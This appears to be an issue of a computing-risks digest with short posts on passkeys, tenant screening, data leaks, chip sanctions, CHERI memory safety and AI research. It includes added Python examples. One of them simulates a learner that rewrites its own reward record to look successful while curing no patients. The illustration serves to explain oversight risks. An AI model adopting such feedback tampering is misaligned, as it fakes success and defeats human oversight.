I have long advocated for FIDO U2F security keys as the preferred multiple
factor authentication model, and have suggested explicitly that "passwords
must die". So it's natural that I'm being asked about the @google "passkey"
initiative.

There are multiple aspects to this. An obvious one is how rapidly sites will
implement this method. Given the glacial speed with which many financial
institutions have implemented crude 2-factor like text messaging and have
delayed U2F key implementations, I am not optimistic.

Of even more concern is the sense that the methodology of passkeys will
appeal mainly to the tech-savvy, and will be understandably resisted by many
everyday users, who will find the model overly complex and difficult to
trust for that reason.

This presents a familiar dilemma: persons who already are careful with their
authentication security will benefit but the users most in need of improved
security and who are most vulnerable largely will not—especially if they
don't use multiple devices and 24/7 smartphones.

The upshot isn't that passkeys won't have a place—they will—but that I
suspect they will not be accepted by a significant proportion of sites and
users, keeping in mind that many people even refuse to use ordinary
autofill, especially for passwords or payment methods.

I have pointed out this problem with @google outreach to users many times
over the years, and again, while there have been some improvements, many
users are still being left behind, and that's very unfortunate indeed.


How Your Shadow Credit Score Could Decide Whether You Get an Apartment (ProPublica)

Gabe Goldberg <gabe@gabegold.com>
Sun, 16 Oct 2022 22:27:03 -0400
Fuller learned her rental application had been screened by RentGrow, one of
more than a dozen companies that mine consumer databases to perform
background checks on tenants. A form emailed to her said RentGrow determined
she didn't meet applicant screening requirements, highlighting in yellow the
box labeled *credit history*.

The letter provided no further explanation. A RentGrow representative,
through an executive at its parent company, declined to comment. Habitat
America declined to respond to questions about Fuller's application from
ProPublica, citing privacy concerns.

You don't know why you got denied or if you were ever considered.  It's
really murky out there.


U.S. Chip Sanctions Kneecap China's Tech Industry (WiReD)

Gabe Goldberg <gabe@gabegold.com>
Thu, 13 Oct 2022 23:53:32 -0400
The toughest export restrictions yet cut off AI hardware and chip-making
tools crucial to China's commercial and military ambitions.

https://www.wired.com/story/us-chip-sanctions-kneecap-chinas-tech-industry


The danger of advanced artificial intelligence controlling its own feedback (techxplore.com)

Richard Marlon Stein <rmstein@protonmail.com>
Tue, 25 Oct 2022 06:41:49 +0000
https://techxplore.com/news/2022-10-danger-advanced-artificial-intelligence-feedback.html

"What we now call the reinforcement learning problem was first considered in
1933 by the pathologist William Thompson. He wondered: if I have two
untested treatments and a population of patients, how should I assign
treatments in succession to cure the most patients?

"More generally, the reinforcement learning problem is about how to plan
your actions to best accrue rewards over the long term. The hitch is that,
to begin with, you're not sure how your actions affect rewards, but over
time you can observe the dependence. For Thompson, an action was the
selection of a treatment, and a reward corresponded to a patient being
cured."

Without human oversight, a generalized superintelligence might be a "no
brainer" waiting to happen. Good script kiddie experiment.
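
Thompson's two-treatment problem quoted above is the simplest reinforcement-learning setting, and the following is an added example (not code from the article) that runs it: each treatment's unknown cure rate gets a Beta posterior, every patient is given the treatment whose sampled rate is highest, and the posterior is updated from the outcome. The cure rates and patient count are constructed. A third, also constructed, "action" illustrates the headline's concern: if the agent can write to its own feedback channel, that action is rewarded every time while helping no patient, and the same learner moves on to it.

```python
"""Thompson's 1933 treatment-assignment problem as a Bernoulli bandit solved
by Thompson sampling, plus a constructed action that corrupts the feedback
channel. Added example; cure rates and patient counts are assumptions."""
import random


def thompson_trial(arms, n_patients, seed=0):
    """Treat n_patients one at a time, choosing by Thompson sampling.

    arms: list of (observed_success_prob, true_cure_prob) per action. For an
    honest treatment both numbers are the same hidden cure rate; the planner
    sees neither, only the per-patient success/failure signal it is given.
    Returns (assignments per arm, successes the planner recorded, patients
    actually cured)."""
    rng = random.Random(seed)
    k = len(arms)
    wins, losses = [1] * k, [1] * k       # Beta(1,1) prior on each cure rate
    assigned, recorded, cured = [0] * k, 0, 0
    for _ in range(n_patients):
        # One posterior draw per arm; act on whichever looks best this time.
        draws = [rng.betavariate(wins[a], losses[a]) for a in range(k)]
        a = max(range(k), key=draws.__getitem__)
        assigned[a] += 1
        observed_p, cure_p = arms[a]
        u = rng.random()                  # the patient's hidden response
        if u < cure_p:
            cured += 1
        if u < observed_p:                # what the learner is told happened
            wins[a] += 1
            recorded += 1
        else:
            losses[a] += 1
    return assigned, recorded, cured


# Constructed rates: treatment B cures 80% of patients, treatment A 30%.
HONEST = [(0.3, 0.3), (0.8, 0.8)]
# Constructed third action: instead of treating, the agent writes "cured"
# into the record. Reward always arrives; no patient is helped.
WITH_FEEDBACK_CONTROL = HONEST + [(1.0, 0.0)]


def compare(n_patients=500, seed=1):
    """Run the honest trial and the feedback-controlled one side by side."""
    return {"honest": thompson_trial(HONEST, n_patients, seed),
            "gamed": thompson_trial(WITH_FEEDBACK_CONTROL, n_patients, seed)}


if __name__ == "__main__":
    for label, (assigned, recorded, cured) in compare().items():
        print(f"{label:7s} assigned={assigned} recorded={recorded} cured={cured}")
```

In the honest run the learner quickly concentrates on the better treatment and cures most patients. In the second run its recorded reward is higher still, and the cure count collapses: nothing in the reward-maximising loop distinguishes a better treatment from a better-controlled feedback channel, which is the oversight problem the article raises.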


Toyota exposed 300,000 customer email addresses for 5 years (Techcrunch)

Monty Solomon <monty@roscom.com>
Wed, 12 Oct 2022 14:17:30 -0400
https://techcrunch.com/2022/10/12/toyota-customer-email-addresses-exposed/


Parler leaked email addresses for Ivanka Trump, other 'VIPs' in Kanye West announcement (Mashable)

Monty Solomon <monty@roscom.com>
Tue, 18 Oct 2022 21:13:10 -0400
https://mashable.com/article/parler-leaks-vip-emails-kanye-west-ivanka-trump


Humans Beat DeepMind AI in Creating Algorithm to Multiply Numbers (Matthew Sparkes)

ACM TechNews <technews-editor@acm.org>
Mon, 17 Oct 2022 11:55:31 -0400 (EDT)
Matthew Sparkes, *New Scientist*, 13 Oct 2022, via ACM TechNews, 17 Oct 2022

Jakob Moosbauer and Manuel Kauers at Austria's Johannes Kepler University
Linz bested an algorithm developed by artificial intelligence company
DeepMind with a program that can perform matrix multiplication more
efficiently. Earlier this month, DeepMind unveiled a method for multiplying
two five-by-five matrices in just 96 multiplications, out-performing a
more-than-50-year-old record. Moosbauer and Kauers reduced the process to 95
multiplications by testing multiple steps in multiplication algorithms to
see if they could be combined. Said Moosbauer, "We take an existing
algorithm and apply a sequence of transformations that at some point can
lead to an improvement. Our technique works for any known algorithm, and if
we are lucky, then [the results] need one multiplication less than before."

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f6b4x236dbax072760&


Deception Detection (RAND)

Gabe Goldberg <gabe@gabegold.com>
Thu, 20 Oct 2022 16:31:43 -0400
A group of RAND Corporation researchers found that machine-learning (ML)
models can identify signs of deception during national security background
check interviews. The most accurate approach for detecting deception is an
ML model that counts the number of times that interviewees use common words.

https://www.rand.org/pubs/research_briefs/RBA873-1.html

  [The?  Er?  Um?  You-know?  Well?   PGN]


Re: AI-driven 'thermal attack' system reveals computer and smartphone passwords in seconds (Techxplore)

Steve Bacher <sebmb1@verizon.net>
Thu, 13 Oct 2022 15:28:45 -0700
This suggests to me that a good strategy to confound the thermal detectors
would be to use repeated characters in passwords. I doubt that the thermal
detection would be able to tell how many times a key was pressed, rather
than just the recency of a given key press. That would go against the common
assumption that repeated characters in passwords are a Bad Thing.


Re: Lufthansa Says Apple AirTags Are Once Again Allowed in Checked Bags (RISKS-33.48)

Jan Wolitzky <jan.wolitzky@gmail.com>
Wed, 12 Oct 2022 17:49:13 -0400
Never mind!

The airline reversed itself Wednesday, saying it had consulted with German
aviation authorities, who agreed that Bluetooth trackers were safe for
passengers to use.

https://www.nytimes.com/2022/10/12/travel/lufthansa-apple-airtags-luggage.html


Re: Not a physical DDoS attack on the Australian Postal system (Auspost)

"John Levine" <johnl@iecc.com>
12 Oct 2022 18:10:15 -0400
If you read the reasons they give, I wouldn't call it a DoS attack but
rather yet another fragile supply chain.  COVID caused a lot of mail that
would have normally been sent by air to be sent by sea, and it appears that
the places they inspect airmail are not the ones where they inspect sea
mail, what with airports and seaports being different.

It's like the Great Toilet Paper Shortage which turned out not to be that
there wasn't enough, but that there are different kinds for homes and
institutions.  When everyone started staying home, it was not easy to
repackage and redirect the institutional kind for home use.


Re: Automatic emergency braking is not great at preventing crashes at normal speeds (RISKS-33.48)

Martin Ward <martin@gkc.org.uk>
Thu, 13 Oct 2022 10:41:00 +0100
Naturally, I would like more research into why so many cars are crashing
into the chicane (a large, clearly marked, immobile structure): but this is
not necessarily a bad thing. Crashing into a chicane is better than mowing
down a child. The chicane is, presumably, better signposted and more visible
than any small child, so any driver who crashed into the chicane is
presumably a risk to children, not just in the road but also on the
pavement: since the chicane hitter obviously has difficulty in keeping to
the road! Perhaps it is just as well that they are taken out of action
before they can do more serious harm?


Article about CHERI

Rik Farrow <rik@rikfarrow.com>
Thu, 13 Oct 2022 14:06:52 -0700
I have long been interested in technology that might make computers more
secure, and have been watching one such project for over a decade. CHERI, a
combined software and hardware project, has now reached the
implemented-in-silicon stage: https://www.arm.com/architecture/cpu/morello.
I have written an article explaining the thinking behind CHERI and how
Microsoft engineers using CHERI believe that they can eliminate as much as two
thirds of vulnerabilities in software that uses C or C++:

https://www.usenix.org/publications/loginonline/redesigning-hardware-support-security-cheri

CHERI provides hardware support for limiting the range of pointers as well
as support for mechanisms to prevent use-after-free bugs. CHERI provides
scalable compartmentalization, meaning that operating systems themselves can
be partitioned on memory boundaries without the performance expense of
changing context or flushing page caches. Overall, CHERI is a project that
may prove to be the most significant change in architecture in decades.

  [Rik Farrow is the Editor of ;login:   PGN]
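
The checks the paragraph attributes to CHERI hardware can be sketched in software. The following is an added example, a simplified Python model and not CHERI's ISA, Morello, or any Microsoft code: a pointer is a capability carrying bounds, permissions and a validity tag; every load and store is checked against them; a capability derived from another can only shrink its bounds and permissions; and freeing an allocation clears the tag of every capability still pointing into it, which is how a later use-after-free becomes a fault instead of a silent read of reused memory. The memory layout, permission names and the way revocation is tracked are assumptions made for the model.

```python
"""Software model of the CHERI properties the article describes: bounded,
tagged, permission-carrying pointers with monotonic derivation and
revocation on free. Illustrative only; not the CHERI ISA or real code."""


class CapFault(Exception):
    """Stands in for the hardware exception a CHERI core raises."""


class Capability:
    def __init__(self, base, length, perms, tag=True):
        self.base, self.length = base, length
        self.perms, self.tag = frozenset(perms), tag
        self.children = []                # capabilities derived from this one

    def derive(self, offset=0, length=None, perms=None):
        """Return a narrower capability. Bounds and permissions are monotonic:
        the child can never reach memory or rights the parent lacks."""
        if not self.tag:
            raise CapFault("deriving from an invalid capability")
        length = self.length - offset if length is None else length
        if offset < 0 or length < 0 or offset + length > self.length:
            raise CapFault("derived bounds exceed parent bounds")
        perms = self.perms if perms is None else frozenset(perms)
        if not perms <= self.perms:
            raise CapFault("derived permissions exceed parent permissions")
        child = Capability(self.base + offset, length, perms)
        self.children.append(child)
        return child


class Memory:
    """A flat byte array whose load/store paths enforce capabilities."""

    def __init__(self, size):
        self.cells = bytearray(size)
        self.next_free = 0                # bump allocator (assumption)

    def alloc(self, length):
        """Like malloc(): a capability whose bounds are exactly the object."""
        cap = Capability(self.next_free, length, {"load", "store"})
        self.next_free += length
        return cap

    def free(self, cap):
        """Model of revocation: the freed capability and everything derived
        from it lose their tag, so later dereferences fault."""
        cap.tag = False
        for child in cap.children:
            self.free(child)

    def _check(self, cap, offset, perm, width=1):
        if not cap.tag:
            raise CapFault("capability tag cleared (use after free?)")
        if perm not in cap.perms:
            raise CapFault(f"missing {perm} permission")
        if offset < 0 or offset + width > cap.length:
            raise CapFault(f"access at {offset} outside [0, {cap.length})")
        return cap.base + offset

    def load(self, cap, offset):
        return self.cells[self._check(cap, offset, "load")]

    def store(self, cap, offset, value):
        self.cells[self._check(cap, offset, "store")] = value & 0xFF


def faults(fn):
    """True if fn() trips a capability check; lets the demo read as assertions."""
    try:
        fn()
    except CapFault:
        return True
    return False


def demo():
    """Exercise the three bug classes the text mentions; every value is True."""
    mem = Memory(64)
    buf = mem.alloc(16)                   # like malloc(16)
    for i in range(16):
        mem.store(buf, i, i)
    results = {
        "in_bounds": mem.load(buf, 15) == 15,
        "off_by_one_trapped": faults(lambda: mem.load(buf, 16)),
        "cannot_widen": faults(lambda: buf.derive(0, 32)),
    }
    view = buf.derive(4, 4, {"load"})     # read-only window onto buf[4:8]
    results["ro_view_load"] = mem.load(view, 0) == 4
    results["ro_view_store_trapped"] = faults(lambda: mem.store(view, 0, 1))
    mem.free(buf)                         # revokes buf and the view
    results["use_after_free_trapped"] = faults(lambda: mem.load(view, 0))
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:26s} {'ok' if ok else 'FAILED'}")
```

The compartmentalization point in the paragraph follows from the same mechanism: a component given only narrowed capabilities cannot address memory outside them, so isolation comes from the bounds on the pointers it holds rather than from a separate address space.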


U.S. National Security Strategy report

Peter Neumann <neumann@csl.sri.com>
Thu, 13 Oct 2022 10:22:43 PDT
The White House has released its National Security Strategy report,

The full report is at
https://www.whitehouse.gov/wp-content/uploads/2022/10/Biden-Harris-Administrations-National-Security-Strategy-10.2022.pdf

A summary is at
https://www.whitehouse.gov/briefing-room/speeches-remarks/2022/10/13/remarks-by-national-security-advisor-jake-sullivan-on-the-biden-harris-administrations-national-security-strategy/


Book on Digital Ethics (Christian Fuchs)

Christian Fuchs via iacap-announce <iacap-announce@iacap.org>
Fri, 21 Oct 2022 10:42:15 +0200
Christian Fuchs. 2023. Digital Ethics. Media, Communication and Society
Volume Five. New York: Routledge. ISBN 9781032246161.
More info and sample chapter:
https://fuchsc.uti.at/books/digital-ethics/

This fifth volume in Christian Fuchs, Media, Communication and Society
series, presents an approach to critical digital ethics. It develops
foundations and applications of digital ethics based on critical theory. It
applies a critical approach to ethics within the realm of digital
technology.

Based on the notions of alienation, communication (in)justice, media
(in)justice, and digital (in)justice, it analyses ethics in the context of
digital labour and the surveillance-industrial complex; social media
research ethics; privacy on Facebook; participation, co-operation, and
sustainability in the information society; the digital commons; the digital
public sphere; and digital democracy. The book consists of three parts. Part
I presents some of the philosophical foundations of critical, humanist
digital ethics. Part II applies these foundations to concrete digital ethics
case studies. Part III presents broad conclusions about how to advance the
digital commons, the digital public sphere, and digital democracy, which is
the ultimate goal of critical digital ethics.  [...]
